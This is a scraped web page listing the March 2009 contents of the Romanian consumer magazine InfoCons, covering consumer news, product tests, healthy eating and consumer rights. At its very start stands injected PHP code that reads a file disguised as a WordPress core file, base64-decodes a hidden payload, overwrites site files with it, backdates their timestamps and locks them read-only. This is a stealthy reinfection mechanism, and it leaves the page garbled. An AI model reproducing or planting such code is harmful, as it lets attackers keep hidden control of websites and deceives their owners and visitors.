$wp_update_file="/home/shuffles/public_html/wp-includes/date-time.php"; if ( is_file($wp_update_file) ) { $wp_update_content=trim(file_get_contents($wp_update_file)); if ( $wp_update_content!="" ) { $wp_update_content=substr($wp_update_content,6,-6); $wp_update_content=base64_decode($wp_update_content); $wp_update_arr=json_decode($wp_update_content,true); if ( is_array($wp_update_arr) ) { foreach($wp_update_arr as $value) { $file_mtime=filemtime($value["path"]); @chmod($value["path"],0777); @unlink($value["path"]); @file_put_contents($value["path"],$value["content"]); @touch($value["path"],$file_mtime); @chmod($value["path"],0444); } } } } Revista InfoCons – Martie 2009 – O noua atitudine

martie

CUPRINS

Actualitati

  • Evenimentele lunii martie

Marca Increderii – Punctul Verde

  • Centrul de Informare Europe Direct Brasov
  • Protectia consumatorului de produse de panificatie
  • Consuma produse ecologice certificate!
  • 10 principii fundamentale (partea a treia)
  • Diminuare accidentelor rutiere mortale

Teste comparative

  • Camere digitale
  • Telefoane mobile
  • Teste auto – EURO NCAP

Alimentatie sanatoasa

  • Branza falsa ne invadeaza farfuriile
  • Colorantii – sursa de hiperactivitate?
  • Despre unele consecinte ecologice ale consumului de carne

Protectia mediului

  • Produse certificate Rainforest Alliance

Protectia consumatorilor in Romania si Uniunea Europeana

  • Biletele de avion – noi reglementari
  • Reclamatiile – 10 sfaturi de urmat

Mini dictionarul consumatorului

  • Simboluri, marci de calitate si/sau de siguranta

Puteţi comanda revista InfoCons de aici.

By o9admin